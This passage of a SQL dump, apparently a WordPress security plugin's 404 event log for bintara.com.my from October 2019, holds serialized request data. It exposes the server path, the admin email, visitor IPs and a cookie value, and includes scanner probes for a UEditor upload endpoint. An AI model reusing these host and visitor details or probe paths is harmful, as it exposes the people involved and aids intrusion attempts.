;s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakwOfmhtecMB5k7bacP4AAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571369017.6499\";s:12:\"REQUEST_TIME\";s:10:\"1571369017\";}}','notice','2019-10-18 03:23:39','2019-10-18 03:23:38',35271120,37065720,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'118.100.122.157'),(28253,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2548F25C-408A-4D02-83A7-0685EF567CFC\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaj6Z-b4yAloRZFRtQOvqQAAAUQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"58.26.162.130\";s:11:\"REMOTE_PORT\";s:5:\"50374\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xaj6Z-b4yAloRZFRtQOvqQAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571355239.3993\";s:12:\"REQUEST_TIME\";s:10:\"1571355239\";}}','notice','2019-10-17 23:34:01','2019-10-17 23:33:59',35271144,37066808,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'58.26.162.130'),(28254,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/ueditor/net/controller.ashx\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:49:\"http://bintara.com.my/ueditor/net/controller.ashx\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakQJ-b4yAloRZFRtQO@ggAAAUg\";s:12:\"REDIRECT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"106.36.160.193\";s:11:\"REMOTE_PORT\";s:5:\"55545\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:10:\"SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakQJ-b4yAloRZFRtQO@ggAAAUg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571360807.5631\";s:12:\"REQUEST_TIME\";s:10:\"1571360807\";}}','notice','2019-10-18 01:06:50','2019-10-18 01:06:48',35360184,37168624,'https://bintara.com.my/ueditor/net/controller.ashx',1,0,'106.36.160.193'),(28255,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/ueditor/net/controller.ashx\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-CN\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=d0852a5865f1351541ec6623ad36a90a\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:50:\"http://bintara.com.my//ueditor/net/controller.ashx\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakSDJmA1jUkTR6fHyRNSQAAAEU\";s:12:\"REDIRECT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"106.36.161.203\";s:11:\"REMOTE_PORT\";s:5:\"55437\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:50:\"https://bintara.com.my/ueditor/net/controller.ashx\";s:10:\"SCRIPT_URL\";s:28:\"/ueditor/net/controller.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakSDJmA1jUkTR6fHyRNSQAAAEU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571361292.145\";s:12:\"REQUEST_TIME\";s:10:\"1571361292\";}}','notice','2019-10-18 01:14:53','2019-10-18 01:14:52',34970544,36778360,'https://bintara.com.my/ueditor/net/controller.ashx',1,0,'106.36.161.203'),(28256,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3315.3 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakVuGxQCXaLINxK9P7vcgAAAMo\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:12:\"77.126.70.96\";s:11:\"REMOTE_PORT\";s:5:\"60422\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakVuGxQCXaLINxK9P7vcgAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571362232.1323\";s:12:\"REQUEST_TIME\";s:10:\"1571362232\";}}','notice','2019-10-18 01:30:35','2019-10-18 01:30:32',35362064,37168456,'https://bintara.com.my/our-history/about1/',1,0,'77.126.70.96'),(28257,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"CCCD6EA1-8B72-449A-9B2A-73662F588ACD\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakV8JmA1jUkTR6fHyRRrAAAAFQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"203.106.173.27\";s:11:\"REMOTE_PORT\";s:5:\"58171\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakV8JmA1jUkTR6fHyRRrAAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571362288.9026\";s:12:\"REQUEST_TIME\";s:10:\"1571362288\";}}','notice','2019-10-18 01:31:30','2019-10-18 01:31:29',35272120,37066056,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.27'),(28258,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"0B76DE62-DCCA-4BBE-ABC2-07B896B8CB58\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakWp5mA1jUkTR6fHyRSjQAAAEs\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"203.106.173.27\";s:11:\"REMOTE_PORT\";s:5:\"60490\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakWp5mA1jUkTR6fHyRSjQAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571362471.6706\";s:12:\"REQUEST_TIME\";s:10:\"1571362471\";}}','notice','2019-10-18 01:34:33','2019-10-18 01:34:32',35272120,37066056,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.27'),(28259,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"797FD838-EE22-4B16-BC59-6AEFA4257B12\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakW0ZmA1jUkTR6fHyRSrwAAAFM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"203.106.173.27\";s:11:\"REMOTE_PORT\";s:5:\"61291\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakW0ZmA1jUkTR6fHyRSrwAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571362513.5659\";s:12:\"REQUEST_TIME\";s:10:\"1571362513\";}}','notice','2019-10-18 01:35:16','2019-10-18 01:35:14',35272120,37066056,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.27'),(28260,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"DEDFEF58-AD69-44D2-AA13-06DB57632EF9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xaki704GZAhSKnwjBMzRHgAAAAw\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodis